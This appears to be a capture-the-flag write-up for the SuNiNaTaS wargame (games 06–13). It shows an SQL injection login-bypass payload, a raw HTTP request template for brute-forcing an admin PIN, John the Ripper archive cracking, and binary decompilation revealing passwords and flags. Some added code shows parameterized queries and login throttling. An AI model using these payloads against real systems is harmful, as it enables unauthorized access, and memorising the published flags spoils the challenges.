Hello Navi

note and sharing

challenges

Game 06

Vulnerability: SQL Injection

Attack Vector

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Inject with 1' or '1' like '1:

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

This bypasses the password check by making the condition always true.
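The same query run against an in-memory SQLite table, next to a parameterized version that binds the input as data. This is an added example, not code from the challenge: SQLite stands in for the challenge's database, and the rows and function names are constructed.

```python
import sqlite3

# Constructed stand-in for the challenge table; the stored passwords are made up.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE T_Web13 (nIdx TEXT, szPwd TEXT)")
conn.executemany(
    "INSERT INTO T_Web13 VALUES (?, ?)",
    [("1", "alpha"), ("2", "bravo"), ("3", "s3cret-constructed")],
)


def check_concatenated(pwd):
    """Vulnerable form from the page: user input is pasted into the SQL text."""
    sql = ("select szPwd from T_Web13 where "
           "nIdx = '3' and szPwd = '" + pwd + "'")
    return conn.execute(sql).fetchall()


def check_parameterized(pwd):
    """Hardened form: the driver binds pwd as a value, never as SQL syntax."""
    sql = "select szPwd from T_Web13 where nIdx = '3' and szPwd = ?"
    return conn.execute(sql, (pwd,)).fetchall()


PAYLOAD = "1' or '1' like '1"   # the input shown on the page

if __name__ == "__main__":
    # AND binds tighter than OR, so the WHERE clause parses as
    # (nIdx = '3' AND szPwd = '1') OR ('1' LIKE '1'): true for every row.
    print("concatenated :", check_concatenated(PAYLOAD))
    print("parameterized:", check_parameterized(PAYLOAD))
    print("legit login  :", check_parameterized("s3cret-constructed"))
```

With the bound parameter the whole payload is compared to szPwd as one literal string, so the query returns no rows.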

Success Response

Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>
Augustus

Game 07

uBlock (browser add-on), btw.

Refresh the page and click the button.

<input type="submit" value="YES" />
G0Od d@y

Game 08

Vulnerability: Brute Force

Hint: Login as 'admin' with password in range 0 ~ 9999

Tool: ZAProxy

Attack

Use fuzzing to brute force the password parameter from 0 to 9999.

POST http://suninatas.com/challenge/web08/web08.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web08/web08.asp
Cookie: ASPSESSIONIDQSBTDCST=FNDPAPJCJDFBJAAENDCKDGDK
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=admin&pw=$$
l3ruteforce P@ssword
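Why the sweep works here: nothing limits failed logins, so a 10,000-value keyspace is covered in one pass. The sketch below is an added example, not part of the challenge. It puts a per-account failure limit in front of the password check and replays the same 0..9999 sweep; the class, function names, thresholds and the secret "7000" are all constructed.

```python
from collections import defaultdict, deque


class LoginThrottle:
    """Lock an account after max_failures failed logins inside window_ms."""

    def __init__(self, max_failures=5, window_ms=300_000, lockout_ms=900_000):
        self.max_failures = max_failures
        self.window_ms = window_ms
        self.lockout_ms = lockout_ms
        self.failures = defaultdict(deque)   # account -> failure timestamps (ms)
        self.locked_until = {}               # account -> unlock time (ms)

    def allowed(self, account, now_ms):
        return now_ms >= self.locked_until.get(account, 0)

    def record_failure(self, account, now_ms):
        q = self.failures[account]
        q.append(now_ms)
        while now_ms - q[0] > self.window_ms:
            q.popleft()                      # drop failures older than the window
        if len(q) >= self.max_failures:
            self.locked_until[account] = now_ms + self.lockout_ms
            q.clear()


def login(throttle, secret, account, pw, now_ms):
    """Return 'locked', 'ok' or 'fail'; pw is compared only when not locked."""
    if not throttle.allowed(account, now_ms):
        return "locked"
    if pw == secret:
        return "ok"
    throttle.record_failure(account, now_ms)
    return "fail"


def simulate_sweep(secret, interval_ms=100):
    """Replay pw=0..9999 for 'admin', one request every interval_ms."""
    throttle = LoginThrottle()
    counts = {"ok": 0, "fail": 0, "locked": 0}
    for i in range(10000):
        counts[login(throttle, secret, "admin", str(i), i * interval_ms)] += 1
    return counts


if __name__ == "__main__":
    # "7000" is a constructed secret, not the challenge's password.
    print(simulate_sweep("7000"))
```

Only 10 of the 10,000 requests reach the password comparison; a secret that happens to sit among the first few guesses is still found, so the limit complements a larger password space rather than replacing it.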

Game 09

Challenge: Reverse engineering a Windows executable

Step 1: Extract Archive

7z x SuNiNaTaS.zip

Step 2: Identify File

file Project1.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections

Step 3: Analyze with IDA

Run the executable in a virtual environment (Windows 10, VirtualBox).

The program displays an input box with two buttons.

Use IDA Pro and press Shift+F12 to view strings. Look for the "Congratulation!" message, then double-click to find cross-references.

Step 4: Find Password

From IDA disassembly:

CODE:00450388 ; ---------------------------------------------------------------------------
CODE:00450389 align 4
CODE:0045038C _str_913465 _strings <0FFFFFFFFh, 6, '913465'>
CODE:0045038C ; DATA XREF: _TForm1_Button1Click+1B↑o
CODE:0045039B align 4
CODE:0045039C ; const CHAR aSuninatas[]
CODE:0045039C aSuninatas db 'SuNiNaTaS',0 ; DATA XREF: _TForm1_Button1Click+45↑o
CODE:004503A6 align 4
CODE:004503A8 ; const CHAR aCongratulation[]
CODE:004503A8 aCongratulation db 'Congratulation!',0 ; DATA XREF: _TForm1_Button1Click+4A↑o

Game 10

Challenge: Reverse engineering a .NET Windows executable

Step 1: Extract and Identify

7z x reversing.zip
file reversing.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections

Step 2: Hex Analysis

From hex view, strings are readable in Unicode format:

2theT@P, Authkey: Did U use the Peid?, SuNiNaTaS, Try again!, explorer, http://suninatas.com, textBox1, button1, OK, label2, Made by 2theT0P, button2, QUIT, Form1, WindowsFormsApplication1, Properties, Resources

The program is based on WinForms.

Step 3: Decompile with dnSpyEx

Run dnSpyEx on Windows and drag the file into it to decompile.

Decompiled Code

// WindowsFormsApplication1.Form1
// Token: 0x06000003 RID: 3 RVA: 0x00002068 File Offset: 0x00000268
private void button1_Click(object sender, EventArgs e)
{
    string text = "2theT@P";
    string text2 = "Authkey : Did U use the Peid?";
    if (this.textBox1.Text == text)
    {
        MessageBox.Show(text2, "SuNiNaTaS");
        this.textBox1.Text = "";
        return;
    }
    MessageBox.Show("Try again!", "SuNiNaTaS");
    this.textBox1.Text = "";
}

Game 11

Challenge: Reverse engineering a Windows executable with string manipulation

Step 1: Identify File

file Project1.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections

Step 2: Extract Strings from Hex

From IDA disassembly, key strings:

CODE:0045041C  Congratulation!
CODE:00450434 Authkey :
CODE:004504B8 2abbe4b6
CODE:004504CC 44536ca0
CODE:004504E0 81aae922
CODE:004504F4 e32fa0de

Step 3: Analyze Form Creation

In _TForm1_FormCreate, these strings are assigned to variables at offsets:

lea     eax, [ebx+300h]
mov     edx, offset _str_2abbe4b6.Text
call    @System@@LStrAsg$qqrpvpxv

lea     eax, [ebx+304h]
mov     edx, offset _str_44536ca0.Text
call    @System@@LStrAsg$qqrpvpxv

lea     eax, [ebx+308h]
mov     edx, offset _str_81aae922.Text
call    @System@@LStrAsg$qqrpvpxv

lea     eax, [ebx+30Ch]
mov     edx, offset _str_e32fa0de.Text
call    @System@@LStrAsg$qqrpvpxv

The strings are then concatenated in the following push order (308h comes before 304h):

push    dword ptr [ebx+300h]
push    dword ptr [ebx+308h]
push    dword ptr [ebx+304h]
push    dword ptr [ebx+30Ch]

Result: 2abbe4b681aae92244536ca0e32fa0de


Alternative: Decompiled Code Analysis

int __fastcall TForm1_Button1Click(int a1)
{
    System::__linkproc__ LStrAsg(a1 + 784, &str_2V[1]);
    System::__linkproc__ LStrAsg(a1 + 788, &str_XS[1]);
    System::__linkproc__ LStrAsg(a1 + 792, &str_B6[1]);
    System::__linkproc__ LStrAsg(a1 + 796, &str_H1[1]);
    System::__linkproc__ LStrAsg(a1 + 800, &str_0F[1]);

    System::__linkproc__ LStrCatN(
        a1 + 816,
        5,
        v2,
        *(_DWORD *)(a1 + 792), // B6
        *(_DWORD *)(a1 + 796), // H1
        *(_DWORD *)(a1 + 788), // XS
        *(_DWORD *)(a1 + 800)); // 0F
}

The strings are rearranged in the concatenation. Check assembly for the actual order.

Assembly Order

push    dword ptr [ebx+310h] ; 2V
push    dword ptr [ebx+318h] ; B6
push    dword ptr [ebx+31Ch] ; H1
push    dword ptr [ebx+314h] ; XS
push    dword ptr [ebx+320h] ; 0F

; Password: 2VB6H1XS0F
2abbe4b681aae92244536ca0e32fa0de

Game 12

Challenge: Reverse engineering a Flash SWF file

Step 1: Scan QR Code

Access the admin panel at http://suninatas.com/admin/ and scan the QR code.

QR Data:

MECARD:N:;TEL:;EMAIL:;NOTE:;URL:http://suninatas.com/admin/admlogin.asp;ADR:;

Step 2: Download SWF File

Navigate to the URL in the QR code and find the Flash embed:

<embed src="admlogin.swf">

Download the SWF file.

Step 3: Identify File

file admlogin.swf

Output: Macromedia Flash data (compressed), version 8

Step 4: Decompile with FFDec

Install FFDec (Free Flash Decompiler):

paru -Ss ffdec
# aur/ffdec 25.0.0-2 - Open Source Flash SWF decompiler and editor

Import the SWF file into FFDec and search for authentication logic.

Decompiled Code

on(release){
    function receipt()
    {
        if(flashid != "admin" or flashpw != "myadmin!@")
        {
            flashmessage = "Wrong ID or PW";
            play();
        }
        else
        {
            flashmessage = "Auth : Today is a Good day~~~";
            play();
        }
    }
    receipt();
}

Credentials:
- ID: admin
- Password: myadmin!@

Today is a Good day~~~

Game 13

Challenge: Forensics - Steganography in ZIP and images

Hint: The programmer's bad habit of backing up source code

Step 1: Find and Download ZIP

The hint suggests looking for a backup file:

http://suninatas.com/challenge/web13/web13.zip

Step 2: Extract ZIP File

The ZIP is password-protected. Try extracting:

7z x web13.zip

Output:

ERROR: Wrong password : whitehack1.jpg
ERROR: Wrong password : whitehack2.jpg
ERROR: Wrong password : whitehack3.jpg
ERROR: Wrong password : whitehack4.jpg
ERROR: Wrong password : 4ڸ.txt

Note: Set the locale to Korean if needed, or use unar instead, which handles the filename encoding automatically:

unar web13.zip

Output reveals: 압축비번은4자리정수 (The compression password is a 4-digit integer)

Step 3: Brute Force Password

Use John the Ripper with a 4-digit wordlist:

zip2john web13.zip > hash.txt
john hash.txt --wordlist=~/ctf/tool/dic/SecLists/Fuzzing/4-digits-0000-9999.txt

Result: 7642 is the password

Step 4: Extract Files

After extracting with password 7642:

unar web13.zip

Open the text file with encoding EUC-KR.

Content: Combine the four images to find the key.

Step 5: Extract Data from Images

Use hex dump to find hidden data in each image:

whitehack1.jpg:

xxd whitehack1.jpg | head -20

Contains: first key : 3nda192n

whitehack2.jpg:

xxd whitehack2.jpg | head -20

Contains: second key : 84ed1cae

whitehack3.jpg:

xxd whitehack3.jpg | head -20

Contains: third key: 8abg9295

whitehack4.jpg:

xxd whitehack4.jpg | head -20

Contains: fourth key : cf9eda4d

Step 6: Combine Keys

Concatenate all four keys in order:

3nda192n + 84ed1cae + 8abg9295 + cf9eda4d

3nda192n84ed1cae8abg9295cf9eda4d
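Steps 5 and 6 scripted, as an added example that is not part of the original write-up: it scans the same first 320 bytes that `xxd | head -20` shows for printable runs, picks out the labelled fragment, and joins the fragments by label. The sample byte strings are constructed around the four strings above (the real images are not included), and all function names are made up.

```python
import re

HEAD_BYTES = 20 * 16   # `xxd file | head -20` shows 20 rows of 16 bytes
ORDER = [b"first", b"second", b"third", b"fourth"]
# Labels on the page differ in spacing: "first key : x" but "third key: x".
KEY_RE = re.compile(rb"(first|second|third|fourth) key\s*:\s*([0-9A-Za-z]+)")


def printable_runs(data, min_len=6):
    """Return runs of printable ASCII at least min_len long, like strings(1)."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def find_key(data):
    """Return (ordinal, value) for a labelled key in the file head, else None."""
    for run in printable_runs(data[:HEAD_BYTES]):
        m = KEY_RE.search(run)
        if m:
            return m.group(1), m.group(2).decode("ascii")
    return None


def combine(blobs):
    """Join the fragments by their ordinal label, not by file order."""
    found = {}
    for blob in blobs:
        hit = find_key(blob)
        if hit:
            found[hit[0]] = hit[1]
    missing = [o.decode() for o in ORDER if o not in found]
    if missing:
        raise ValueError("no fragment labelled: " + ", ".join(missing))
    return "".join(found[o] for o in ORDER)


def fake_jpeg(text):
    """Constructed sample: JPEG SOI/APP0 bytes, the text, then binary filler."""
    return b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + text + b"\x00\xff\xdb\x00\x43"


# Constructed inputs carrying the four strings from the write-up, shuffled.
SAMPLE = [fake_jpeg(t) for t in (b"third key: 8abg9295", b"first key : 3nda192n",
                                 b"fourth key : cf9eda4d", b"second key : 84ed1cae")]

if __name__ == "__main__":
    print(combine(SAMPLE))
```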